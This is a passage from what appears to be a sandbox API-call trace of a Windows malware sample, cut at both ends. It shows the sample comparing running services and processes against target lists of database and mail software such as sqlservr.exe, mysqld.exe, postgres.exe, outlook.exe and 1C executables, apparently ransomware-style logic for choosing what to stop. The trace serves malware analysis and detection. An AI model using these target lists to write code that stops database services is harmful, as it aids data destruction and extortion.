(lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0035.511] lstrlenW (lpString="Power") returned 5 [0035.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0035.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0035.511] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0035.512] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0035.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0035.512] lstrlenW (lpString="ProfSvc") returned 7 [0035.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0035.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0035.512] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0035.512] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0035.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0035.512] lstrlenW (lpString="RpcEptMapper") returned 12 [0035.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0035.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0035.512] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0035.512] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0035.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0035.512] lstrlenW (lpString="RpcSs") returned 5 [0035.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0035.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0035.512] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0035.512] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0035.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0035.512] lstrlenW (lpString="SamSs") returned 5 [0035.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0035.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0035.512] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0035.512] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0035.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0035.512] lstrlenW (lpString="Schedule") returned 8 [0035.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0035.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0035.512] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0035.512] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0035.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0035.512] lstrlenW (lpString="SENS") returned 4 [0035.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0035.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0035.512] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0035.512] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0035.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0035.513] lstrlenW (lpString="ShellHWDetection") returned 16 [0035.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0035.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0035.513] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0035.513] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0035.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0035.513] lstrlenW (lpString="Spooler") returned 7 [0035.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0035.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0035.513] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0035.513] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0035.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0035.513] lstrlenW (lpString="SysMain") returned 7 [0035.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0035.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0035.513] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0035.513] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0035.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0035.513] lstrlenW (lpString="Themes") returned 6 [0035.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0035.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0035.513] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0035.513] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0035.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0035.513] lstrlenW (lpString="TrkWks") returned 6 [0035.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0035.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0035.513] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0035.513] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0035.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0035.513] lstrlenW (lpString="UxSms") returned 5 [0035.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0035.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0035.513] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0035.513] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0035.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0035.514] lstrlenW (lpString="WdiServiceHost") returned 14 [0035.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0035.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0035.514] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0035.514] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0035.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0035.514] lstrlenW (lpString="WdiSystemHost") returned 13 [0035.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0035.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0035.514] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0035.514] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0035.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0035.514] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0035.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0035.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0035.514] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0035.514] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0035.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0035.514] lstrlenW (lpString="Winmgmt") returned 7 [0035.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0035.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0035.514] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0035.514] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0035.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0035.514] lstrlenW (lpString="WPDBusEnum") returned 10 [0035.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0035.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0035.514] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0035.514] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0035.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0035.515] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39422b0 | out: hHeap=0x600000) returned 1 [0035.515] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x16c [0035.516] Process32FirstW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0035.517] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0035.517] lstrlenW (lpString="System") returned 6 [0035.517] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0035.517] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0035.517] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0035.518] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0035.518] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0035.518] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0035.518] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0035.518] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0035.518] lstrlenW (lpString="smss.exe") returned 8 [0035.518] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0035.518] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0035.518] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0035.518] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0035.518] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0035.518] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0035.518] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0035.518] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0035.519] lstrlenW (lpString="csrss.exe") returned 9 [0035.519] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0035.519] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0035.519] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0035.519] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0035.519] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0035.519] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0035.519] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0035.519] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0035.520] lstrlenW (lpString="wininit.exe") returned 11 [0035.520] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0035.520] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0035.520] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0035.520] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0035.520] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0035.520] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0035.520] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0035.520] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0035.520] lstrlenW (lpString="csrss.exe") returned 9 [0035.520] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0035.521] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0035.521] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0035.521] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0035.521] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0035.521] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0035.521] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0035.521] lstrlenW (lpString="winlogon.exe") returned 12 [0035.521] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0035.522] lstrlenW (lpString="services.exe") returned 12 [0035.522] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0035.522] lstrlenW (lpString="lsass.exe") returned 9 [0035.522] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0035.523] lstrlenW (lpString="lsm.exe") returned 7 [0035.523] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.524] lstrlenW (lpString="svchost.exe") returned 11 [0035.524] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.524] lstrlenW (lpString="svchost.exe") returned 11 [0035.524] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.525] lstrlenW (lpString="svchost.exe") returned 11 [0035.525] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.525] lstrlenW (lpString="svchost.exe") returned 11 [0035.525] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.526] lstrlenW (lpString="svchost.exe") returned 11 [0035.526] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0035.526] lstrlenW (lpString="audiodg.exe") returned 11 [0035.527] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.527] lstrlenW (lpString="svchost.exe") returned 11 [0035.527] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.528] lstrlenW (lpString="svchost.exe") returned 11 [0035.528] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0035.528] lstrlenW (lpString="dwm.exe") returned 7 [0035.528] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0035.529] lstrlenW (lpString="explorer.exe") returned 12 [0035.529] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0035.530] lstrlenW (lpString="spoolsv.exe") returned 11 [0035.530] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0035.530] lstrlenW (lpString="taskhost.exe") returned 12 [0035.530] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.531] lstrlenW (lpString="svchost.exe") returned 11 [0035.531] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0035.531] lstrlenW (lpString="taskeng.exe") returned 11 [0035.531] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0035.532] lstrlenW (lpString="taskhost.exe") returned 12 [0035.532] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0035.532] lstrlenW (lpString="challenging.exe") returned 15 [0035.533] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0035.533] lstrlenW (lpString="pgp prix.exe") returned 12 [0035.533] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0035.534] lstrlenW (lpString="user-reno.exe") returned 13 [0035.534] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0035.534] lstrlenW (lpString="aggregate.exe") returned 13 [0035.534] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0035.535] lstrlenW (lpString="dressed.exe") returned 11 [0035.535] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0035.535] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0035.535] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0035.536] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0035.536] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0035.544] lstrlenW (lpString="developing.exe") returned 14 [0035.544] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0035.544] lstrlenW (lpString="supported.exe") returned 13 [0035.544] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0035.999] lstrlenW (lpString="girlstionselect.exe") returned 19 [0035.999] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0035.999] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0035.999] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0036.000] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0036.000] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0036.001] lstrlenW (lpString="eating.exe") returned 10 [0036.001] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0036.001] lstrlenW (lpString="nh_protected.exe") returned 16 [0036.001] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0036.002] lstrlenW (lpString="vulnerability.exe") returned 17 [0036.002] Process32NextW (in: hSnapshot=0x16c, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0036.002] lstrlenW 